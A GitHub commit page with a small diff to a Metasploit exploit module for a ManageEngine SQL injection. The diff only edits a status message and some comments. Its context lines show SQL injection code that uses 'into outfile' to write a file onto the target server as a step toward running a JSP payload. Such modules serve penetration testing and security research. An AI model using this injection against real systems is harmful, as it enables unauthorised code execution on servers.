We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent f9bb910 commit 8eb790fCopy full SHA for 8eb790f
modules/exploits/multi/http/manageengine_search_sqli.rb
@@ -241,7 +241,7 @@ def inject_exec(out)
241
sqli << (2..28).map {|e| e} * ","
242
sqli << " into outfile \"#{out}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"
243
244
- print_status("#{rhost}:#{rport} - Sending JSP payload")
+ print_status("#{rhost}:#{rport} - Trying SQL injection...")
245
sqli_exec(sqli)
246
247
fname = "/#{File.basename(out)}"
@@ -252,10 +252,8 @@ def inject_exec(out)
252
end
253
254
255
- #
256
- # The server must start first, and then we send the malicious requests
257
258
def exploit
+ # This is used to collect files we want to delete later
259
@clean_ups = []
260
261
@my_target = pick_target
0 commit comments